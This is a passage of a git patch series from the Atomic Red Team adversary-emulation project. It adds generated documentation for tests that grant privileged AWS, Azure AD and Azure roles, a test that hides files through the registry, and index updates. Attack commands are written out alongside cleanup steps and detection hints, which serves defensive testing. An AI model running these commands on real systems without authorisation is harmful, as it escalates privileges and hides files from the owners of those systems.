+#### Cleanup Commands:
+```powershell
+Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: PS Module ActiveDirectory
+##### Check Prereq Commands:
+```powershell
+Try {
+    Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+    exit 0
+} 
+Catch {
+    exit 1
+}
+```
+##### Get Prereq Commands:
+```powershell
+if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+  Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+} else {
+  Install-WindowsFeature RSAT-AD-PowerShell
+}
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - AWS - Create a group and add a user to that group
+Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss
+
+**Supported Platforms:** Iaas:aws
+
+
+**auto_generated_guid:** 8822c3b0-d9f9-4daf-a043-49f110a31122
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Name of the AWS group to create | String | atomicredteam|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+aws iam create-group --group-name #{username}
+aws iam add-user-to-group --user-name #{username} --group-name #{username}
+```
+
+#### Cleanup Commands:
+```sh
+aws iam remove-user-from-group --user-name #{username} --group-name #{username}
+aws iam delete-group --group-name #{username}
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Check if the user exists, we can only add a user to a group if the user exists.
+##### Check Prereq Commands:
+```sh
+aws iam list-users | grep #{username}
+```
+##### Get Prereq Commands:
+```sh
+echo Please run atomic test T1136.003, before running this atomic test
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Azure - adding user to Azure AD role
+The adversarie want to add user to some Azure AD role. Threat actor 
+may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, 
+Privileged authentication administrator (this role can reset Global Administrator password!).
+By default, the role Global Reader is assigned to service principal in this test.
+
+The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.
+
+Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see User as a type.
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** 0e65ae27-5385-46b4-98ac-607a8ee82261
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | String | jonh@contoso.com|
+| password | Azure AD password | String | p4sswd|
+| user_principal_name | Name of the targeted user (user principal) | String | SuperUser|
+| role_name | Name of the targed Azure AD role | String | Global Reader|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Import-Module -Name AzureAD
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential
+
+$user = Get-AzureADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+if ($user -eq $null) { Write-Warning "User not found"; exit }
+$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+if ($role -eq $null) { Write-Warning "Role not found"; exit }
+Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId
+Write-Host "User $($user.DisplayName) was added to $($role.DisplayName) role"
+```
+
+#### Cleanup Commands:
+```powershell
+Import-Module -Name AzureAD -ErrorAction Ignore
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential -ErrorAction Ignore
+
+$user = Get-AzureADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+if ($user -eq $null) { Write-Warning "User not found"; exit }
+$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $user.ObjectId
+Write-Host "User $($user.DisplayName) was removed from $($role.DisplayName) role"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: AzureAD module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureAD -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Azure - adding service principal to Azure AD role
+The adversarie want to add service principal to some Azure AD role. Threat actor 
+may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, 
+Privileged authentication administrator (this role can reset Global Administrator password!).
+By default, the role Global Reader is assigned to service principal in this test.
+
+The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.
+
+Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see Service Principal as a type.
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** 92c40b3f-c406-4d1f-8d2b-c039bf5009e4
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | String | jonh@contoso.com|
+| password | Azure AD password | String | p4sswd|
+| service_principal_name | Name of the service principal | String | SuperSP|
+| role_name | Name of the targed Azure AD role | String | Global Reader|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Import-Module -Name AzureAD
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential
+
+$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
+if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+if ($role -eq $null) { Write-Warning "Role not found"; exit }
+Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId
+Write-Host "Service Principal $($sp.DisplayName) was added to $($role.DisplayName)"
+```
+
+#### Cleanup Commands:
+```powershell
+Import-Module -Name AzureAD -ErrorAction Ignore
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential -ErrorAction Ignore
+
+$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
+if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $sp.ObjectId
+Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.DisplayName) role"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: AzureAD module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureAD -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - Azure - adding user to Azure role in subscription
+The adversarie want to add user to some Azure role, also called Azure resource role. Threat actor 
+may be interested primarily in highly privileged roles, e.g. Owner, Contributor.
+By default, the role Reader is assigned to user in this test.
+
+New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.
+
+The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write 
+(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All 
+and Microsoft Graph Directory.Read.All permissions.
+
+Detection hint - check Operation Name "Create role assignment" in subscriptions Activity Logs.
+
+**Supported Platforms:** Iaas:azure
+
+
+**auto_generated_guid:** 1a94b3fc-b080-450a-b3d8-6d9b57b472ea
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | String | jonh@contoso.com|
+| password | Azure AD password | String | p4sswd|
+| user_principal_name | Name of the targeted user (user principal) | String | SuperUser|
+| role_name | Name of the targed Azure role | String | Reader|
+| subscription | Name of the targed subscription | String | Azure subscription 1|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Import-Module -Name Az.Resources
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzAccount -Credential $Credential
+
+$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+if ($user -eq $null) { Write-Warning "User not found"; exit }
+$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
+if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
+$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
+if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+New-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
+Write-Host "User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"
+```
+
+#### Cleanup Commands:
+```powershell
+Import-Module -Name AzureAD -ErrorAction Ignore
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzAccount -Credential $Credential -ErrorAction Ignore
+
+$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+if ($user -eq $null) { Write-Warning "User not found"; exit }
+$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
+if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
+$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
+if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+Remove-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
+Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Az.Resources module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name Az.Resources -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - Azure - adding service principal to Azure role in subscription
+The adversarie want to add service principal to some Azure role, also called Azure resource role. Threat actor 
+may be interested primarily in highly privileged roles, e.g. Owner, Contributor.
+By default, the role Reader is assigned to service principal in this test.
+
+New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.
+
+The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write 
+(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All 
+and Microsoft Graph Directory.Read.All permissions.
+
+Detection hint - check Operation Name "Create role assignment" in subscriptions Activity Logs.
+
+**Supported Platforms:** Iaas:azure
+
+
+**auto_generated_guid:** c8f4bc29-a151-48da-b3be-4680af56f404
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | String | jonh@contoso.com|
+| password | Azure AD password | String | p4sswd|
+| service_principal_name | Name of the service principal | String | SuperSP|
+| role_name | Name of the targed Azure role | String | Reader|
+| subscription | Name of the targed subscription | String | Azure subscription 1|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Import-Module -Name Az.Resources
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzAccount -Credential $Credential
+
+$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
+if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"} 
+if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
+$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
+if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+New-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
+Write-Host "Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"
+```
+
+#### Cleanup Commands:
+```powershell
+Import-Module -Name AzureAD -ErrorAction Ignore
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzAccount -Credential $Credential -ErrorAction Ignore
+
+$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
+if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"} 
+if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
+$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
+if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+Remove-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
+Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Az.Resources module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name Az.Resources -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #8 - AzureAD - adding permission to application
+The adversarie want to add permission to new created application. Application could be then use for persistence or for further operation in the attacked infrastructure. Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor.
+You can use Get-AzureADApplication instead New-AzureADServicePrincipal to use an existing application.
+The DirectoryRecommendations.Read.All permissions have been selected as the default
+
+The account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD.
+
+Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs.
+You can also take a look at the materials:
+https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/
+https://github.com/reprise99/Sentinel-Queries
+https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766
+https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** 94ea9cc3-81f9-4111-8dde-3fb54f36af4b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | String | jonh@contoso.com|
+| password | Azure AD password | String | p4sswd|
+| application_name | Name of the targed application | String | test_app|
+| application_permission | Permission from Microsoft Graph Resource API that will be add to application | String | DirectoryRecommendations.Read.All|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Import-Module -Name AzureAD
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential
+
+$aadApplication = New-AzureADApplication -DisplayName "#{application_name}"
+$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId
+#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"}
+
+#Get Service Principal of Microsoft Graph Resource API 
+$graphSP =  Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq "Microsoft Graph"}
+
+#Initialize RequiredResourceAccess for Microsoft Graph Resource API 
+$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess
+$requiredGraphAccess.ResourceAppId = $graphSP.AppId
+$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]
+
+#Set Application Permissions
+$ApplicationPermissions = @('#{application_permission}')
+
+$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}
+if($reqPermission)
+{
+$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess
+$resourceAccess.Type = "Role"
+$resourceAccess.Id = $reqPermission.Id    
+#Add required app permission
+$requiredGraphAccess.ResourceAccess.Add($resourceAccess)
+}
+else
+{
+Write-Host "App permission $permission not found in the Graph Resource API" -ForegroundColor Red
+}
+
+#Add required resource accesses
+$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]
+$requiredResourcesAccess.Add($requiredGraphAccess)
+
+#Set permissions in existing Azure AD App
+Set-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess
+
+$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}
+
+New-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id
+```
+
+#### Cleanup Commands:
+```powershell
+Import-Module -Name AzureAD
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential
+
+$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"}
+Remove-AzureADApplication -ObjectId $aadApplication.ObjectId
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: AzureAD module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureAD -Force
+```
+
+
+
+
+<br/>

From 3e65326cb9ff33a4cf186098c58194fa77d6047a Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Thu, 17 Mar 2022 17:18:06 +0100
Subject: [PATCH 61/83] Fix reg cleanup T1112 Test 9 (#1815)

* Fix reg cleanup

* ignore errors

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1112/T1112.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index 1e74ca0f..aed17b49 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -167,7 +167,7 @@ atomic_tests:
     command: |
       reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /f
     cleanup_command: |
-      reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /f >nul 2>&1
+      powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\policies\system" -Name DisableRegistryTools -ErrorAction Ignore
     name: command_prompt
     elevation_required: true
 - name: Disable Windows CMD application

From 1b6204cc230bfb8b210e32e7fa824b96cce77a2a Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Thu, 17 Mar 2022 16:18:52 +0000
Subject: [PATCH 62/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/index.yaml | 4 ++--
 atomics/T1112/T1112.md     | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 8754ec81..91e8fe9c 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -31815,8 +31815,8 @@ defense-evasion:
           /v DisableRegistryTools /t REG_DWORD /d 1 /f
 
 '
-        cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system
-          /v DisableRegistryTools /f >nul 2>&1
+        cleanup_command: 'powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\policies\system"
+          -Name DisableRegistryTools -ErrorAction Ignore
 
 '
         name: command_prompt
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index 95ff2ab5..e4526dd0 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -406,7 +406,7 @@ reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\sys
 
 #### Cleanup Commands:
 ```cmd
-reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /f >nul 2>&1
+powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\policies\system" -Name DisableRegistryTools -ErrorAction Ignore
 ```
 
 

From 8d9cfa1fe54a9e6d6e2dcc15a7a92176a5b76319 Mon Sep 17 00:00:00 2001
From: tccontre <26181693+tccontre@users.noreply.github.com>
Date: Thu, 17 Mar 2022 17:23:00 +0100
Subject: [PATCH 63/83] Hide files through registry (#1816)

* Update T1112.yaml

* Update T1112.yaml

* typos

* Update T1564.001.yaml

* Update T1564.001.yaml

* typo

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1564.001/T1564.001.yaml | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)

diff --git a/atomics/T1564.001/T1564.001.yaml b/atomics/T1564.001/T1564.001.yaml
index 7d750c7f..2abeae0e 100644
--- a/atomics/T1564.001/T1564.001.yaml
+++ b/atomics/T1564.001/T1564.001.yaml
@@ -119,3 +119,19 @@ atomic_tests:
     cleanup_command: |
       defaults write com.apple.finder AppleShowAllFiles NO
     name: sh
+- name: Hide Files Through Registry
+  auto_generated_guid: f650456b-bd49-4bc1-ae9d-271b5b9581e7
+  description: |
+    Disable Show Hidden files switch in registry. This technique was abused by several malware to hide their files from normal user.
+    See how this trojan abuses this technique - https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32~Tiotua-P/detailed-analysis.aspx 
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f
+      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /f >nul 2>&1
+      reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true

From 3eadddf970a05f19fef166ad52825fa691ee6821 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Thu, 17 Mar 2022 16:23:41 +0000
Subject: [PATCH 64/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/used_guids.txt | 1 +
 1 file changed, 1 insertion(+)

diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index acd113e5..834a6cd3 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -929,3 +929,4 @@ a4637291-40b1-4a96-8c82-b28f1d73e54e
 7f037590-b4c6-4f13-b3cc-e424c5ab8ade
 9dc7767b-30c1-4cc4-b999-50cab5e27891
 94ea9cc3-81f9-4111-8dde-3fb54f36af4b
+f650456b-bd49-4bc1-ae9d-271b5b9581e7

From 288683be91e0f44883d8b03f1eda853e21930bd9 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Thu, 17 Mar 2022 16:23:47 +0000
Subject: [PATCH 65/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 17 +++++++++
 atomics/T1564.001/T1564.001.md                | 37 +++++++++++++++++++
 6 files changed, 58 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 31890b17..99d0d5ee 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -425,6 +425,7 @@ defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden F
 defense-evasion,T1564.001,Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh
 defense-evasion,T1564.001,Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh
 defense-evasion,T1564.001,Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
+defense-evasion,T1564.001,Hidden Files and Directories,8,Hide Files Through Registry,f650456b-bd49-4bc1-ae9d-271b5b9581e7,command_prompt
 defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
 defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
 defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 3c78d0fd..37e47e0f 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -274,6 +274,7 @@ defense-evasion,T1070.004,File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5
 defense-evasion,T1070.004,File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
 defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt
 defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt
+defense-evasion,T1564.001,Hidden Files and Directories,8,Hide Files Through Registry,f650456b-bd49-4bc1-ae9d-271b5b9581e7,command_prompt
 defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
 defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
 defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 9666ef5b..3e7a10c4 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -675,6 +675,7 @@
   - Atomic Test #5: Hidden files [macos]
   - Atomic Test #6: Hide a Directory [macos]
   - Atomic Test #7: Show all hidden files [macos]
+  - Atomic Test #8: Hide Files Through Registry [windows]
 - [T1564.002 Hidden Users](../../T1564.002/T1564.002.md)
   - Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
   - Atomic Test #2: Create Hidden User using IsHidden option [macos]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 777a40d0..861cab4c 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -465,6 +465,7 @@
 - [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
   - Atomic Test #3: Create Windows System File with Attrib [windows]
   - Atomic Test #4: Create Windows Hidden File with Attrib [windows]
+  - Atomic Test #8: Hide Files Through Registry [windows]
 - [T1564.003 Hidden Window](../../T1564.003/T1564.003.md)
   - Atomic Test #1: Hidden Window [windows]
 - [T1564 Hide Artifacts](../../T1564/T1564.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 91e8fe9c..0f3f7d34 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -28573,6 +28573,23 @@ defense-evasion:
 
 '
         name: sh
+    - name: Hide Files Through Registry
+      auto_generated_guid: f650456b-bd49-4bc1-ae9d-271b5b9581e7
+      description: "Disable Show Hidden files switch in registry. This technique was
+        abused by several malware to hide their files from normal user.\nSee how this
+        trojan abuses this technique - https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32~Tiotua-P/detailed-analysis.aspx
+        \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |
